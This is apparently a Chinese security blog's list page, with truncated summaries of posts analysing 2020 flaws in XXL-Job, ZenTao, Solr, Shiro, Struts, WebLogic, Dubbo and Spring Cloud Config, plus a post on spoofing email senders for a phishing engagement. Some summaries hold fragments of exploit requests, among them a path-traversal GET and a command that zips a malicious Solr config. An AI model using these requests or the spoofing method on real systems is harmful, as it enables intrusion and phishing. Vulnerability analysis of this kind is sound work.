摘要: 利用条件:version ⇐1.9.2 POST /xxl-job-admin/api HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Android 9.0; Mobile; rv:66.0) Gecko/66.0 Firefox/66 阅读全文
posted @ 2020-11-02 10:39 ph4nt0mer 阅读(2017) 评论(0) 推荐(0) 编辑
摘要: CNVD-C-2020-121325禅道文件上传漏洞 CNVD-C-2020-121325文件上传漏洞主要影响以下禅道版本: 禅道开源版<=12.4.2,建议升级到禅道12.4.3以上版本 利用条件:需要后台权限 GET /zentao/client-download-1-aHR0cDovLzEyM 阅读全文
posted @ 2020-10-26 18:09 ph4nt0mer 阅读(1939) 评论(0) 推荐(0) 编辑
摘要: 需要solr以cloud模式启动,特征是: 会有一个cloud的功能 。 编译一个恶意配置: 在对应目录下依次执行以下shell命令。 /solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf zip -r - * > m 阅读全文
posted @ 2020-10-15 18:23 ph4nt0mer 阅读(2002) 评论(0) 推荐(1) 编辑
摘要: 0x00 apache ofbiz介绍 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的 阅读全文
posted @ 2020-08-28 12:15 ph4nt0mer 阅读(3706) 评论(1) 推荐(0) 编辑
摘要: 0x00 什么是shiro Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 0x01 环境搭建 springboot shiro1. 阅读全文
posted @ 2020-08-20 16:49 ph4nt0mer 阅读(3411) 评论(0) 推荐(0) 编辑
摘要: 0x01 问题原因 Apache Struts 框架在强制时对分配给某些标记属性的属性值执行双重计算,以便可以传递一个值,该值将在呈现标记的属性时再次计算。对于精心设计的请求,这可能会导致远程代码执行 (RCE)。 只有在 Struts 标记属性内强制使用OGNL表达式时,当表达式用于计算攻击者可以 阅读全文
posted @ 2020-08-16 14:53 ph4nt0mer 阅读(2344) 评论(2) 推荐(0) 编辑
摘要: 360cert文章地址:https://cert.360.cn/report/detail?id=b747e983cd8f70a9eb315c2c7b38fe24 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 1 阅读全文
posted @ 2020-08-10 14:44 ph4nt0mer 阅读(2417) 评论(5) 推荐(0) 编辑
摘要: 最近接到一个活,是需要给客户进行邮件钓鱼。客户的要求是:伪造他们自己的邮箱进行钓鱼。 之前按我的理解是,邮箱网关服务器配置了spf的话,理论上是无法伪造邮箱的。但是实际上测试好像还是可以的,目前为止好像就qq邮箱比较严,伪造不了,163啥的都可以,只是不能伪造一些大型的域名。 目前搞这些活的思路就是 阅读全文
posted @ 2020-07-02 18:22 ph4nt0mer 阅读(566) 评论(0) 推荐(0) 编辑
摘要: [CVE-2020-1948] Apache Dubbo 反序列化漏洞分析 简介 Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 POC https://www.mail-archive.co 阅读全文
posted @ 2020-06-24 00:29 ph4nt0mer 阅读(2925) 评论(0) 推荐(0) 编辑
摘要: CVE-2020-5405 Spring Cloud Config 目录穿越漏洞分析 CVE-2020-5405 分析 先放 本地 poc: GET /1/1/(_)..(_)..(_)c:/Temp/1.txt HTTP/1.1 Host: 127.0.0.1:8888 User-Agent: M 阅读全文
posted @ 2020-06-18 18:38 ph4nt0mer 阅读(899) 评论(0) 推荐(0) 编辑